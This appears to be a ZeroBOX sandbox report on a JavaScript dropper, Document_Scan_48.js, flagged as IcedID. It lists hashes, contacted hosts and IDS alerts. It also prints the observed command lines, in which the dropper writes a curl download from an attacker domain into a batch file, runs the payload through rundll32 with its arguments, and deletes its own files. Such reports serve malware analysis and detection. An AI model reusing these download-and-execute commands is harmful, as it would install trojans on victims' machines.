Summary | ZeroBOX

Document_Scan_48.js

UPX OS Processor Check PE64 PE File DLL
Category Machine Started Completed
FILE s1_win7_x6401 Aug. 31, 2023, 10:40 a.m. Aug. 31, 2023, 10:42 a.m.
Size 33.5KB
Type ASCII text
MD5 0591fcaf382e5457adf79f4350279ccf
SHA256 bb059a2d52aecf933d0da89b6e68c4f478801eb3f838a92ead1d3d334c873d73
CRC32 4163CE0E
ssdeep 384:8IjboFZjo78IRgC340RVNdkX5NHxOpMkDcTVj+G2jhoJojdpkVz3nqu6ycaI4Hpy:RsS76kVAROprelbmsfwSID/
Yara None matched

IP Address Status Action
104.21.64.90 Active Moloch
164.124.101.2 Active Moloch
184.168.117.217 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49175 -> 104.21.64.90:80 2032086 ET MALWARE Win32/IcedID Request Cookie A Network Trojan was detected

Suricata TLS

Flow Issuer Subject Fingerprint
TLS 1.2
192.168.56.101:49169
184.168.117.217:443
C=US, ST=TX, L=Houston, O=cPanel, Inc., CN=cPanel, Inc. Certification Authority CN=moashraya.com f5:4f:f0:43:5d:87:29:b9:67:28:34:e9:f9:c2:a3:5d:38:79:d1:55

Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: curl
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: https://moashraya.com/out/t.php --output "C:\Users\test22\AppData\Local\Temp\dignissimos.iharum.m" --ssl-no-revoke --insecure --location
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

bind

ip_address: 127.0.0.1
socket: 144
port: 0
1 0 0

listen

socket: 144
backlog: 1
1 0 0

accept

ip_address:
socket: 144
port: 0
1 152 0
suspicious_features GET method with no useragent header suspicious_request GET http://oopscokir.com/
request GET http://oopscokir.com/
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 1404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007304c000
process_handle: 0xffffffffffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\dignissimos.i.bat
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\dignissimos.i.bat"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_48.js"
cmdline cmd.exe /c "C:\Users\test22\AppData\Local\Temp\dignissimos.i.bat"
cmdline "C:\Windows\System32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\dignissimos.i.bat"
cmdline cmd.exe /c ren "C:\Users\test22\AppData\Local\Temp\dignissimos.iharum.m" "dignissimos.i"
cmdline cmd.exe /c echo curl https://moashraya.com/out/t.php --output "C:\Users\test22\AppData\Local\Temp\dignissimos.iharum.m" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\dignissimos.i.bat"
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_48.js"
cmdline "C:\Windows\System32\cmd.exe" /c ren "C:\Users\test22\AppData\Local\Temp\dignissimos.iharum.m" "dignissimos.i"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\dignissimos.i.bat"
cmdline "C:\Windows\System32\cmd.exe" /c echo curl https://moashraya.com/out/t.php --output "C:\Users\test22\AppData\Local\Temp\dignissimos.iharum.m" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\dignissimos.i.bat"
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_48.js"
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c echo curl https://moashraya.com/out/t.php --output "C:\Users\test22\AppData\Local\Temp\dignissimos.iharum.m" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\dignissimos.i.bat"
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c "C:\Users\test22\AppData\Local\Temp\dignissimos.i.bat"
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c ren "C:\Users\test22\AppData\Local\Temp\dignissimos.iharum.m" "dignissimos.i"
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: rundll32
parameters: "C:\Users\test22\AppData\Local\Temp\dignissimos.i", scab /k arabika752
filepath: rundll32
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c del "C:\Users\test22\AppData\Local\Temp\dignissimos.i.bat"
filepath: cmd.exe
1 1 0
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\dignissimos.i.bat"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_48.js"
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_48.js"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\dignissimos.i.bat"
parent_process wscript.exe martian_process rundll32 "C:\Users\test22\AppData\Local\Temp\dignissimos.i", scab /k arabika752
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\dignissimos.i.bat"
parent_process wscript.exe martian_process cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_48.js"
parent_process wscript.exe martian_process cmd.exe /c "C:\Users\test22\AppData\Local\Temp\dignissimos.i.bat"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\dignissimos.i.bat"
parent_process wscript.exe martian_process cmd.exe /c ren "C:\Users\test22\AppData\Local\Temp\dignissimos.iharum.m" "dignissimos.i"
parent_process wscript.exe martian_process cmd.exe /c echo curl https://moashraya.com/out/t.php --output "C:\Users\test22\AppData\Local\Temp\dignissimos.iharum.m" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\dignissimos.i.bat"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_48.js"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c ren "C:\Users\test22\AppData\Local\Temp\dignissimos.iharum.m" "dignissimos.i"
parent_process wscript.exe martian_process cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\dignissimos.i.bat"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c echo curl https://moashraya.com/out/t.php --output "C:\Users\test22\AppData\Local\Temp\dignissimos.iharum.m" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\dignissimos.i.bat"
parent_process wscript.exe martian_process "C:\Windows\System32\rundll32.exe" "C:\Users\test22\AppData\Local\Temp\dignissimos.i", scab /k arabika752
file C:\Windows\System32\cmd.exe
file C:\Windows\System32\rundll32.exe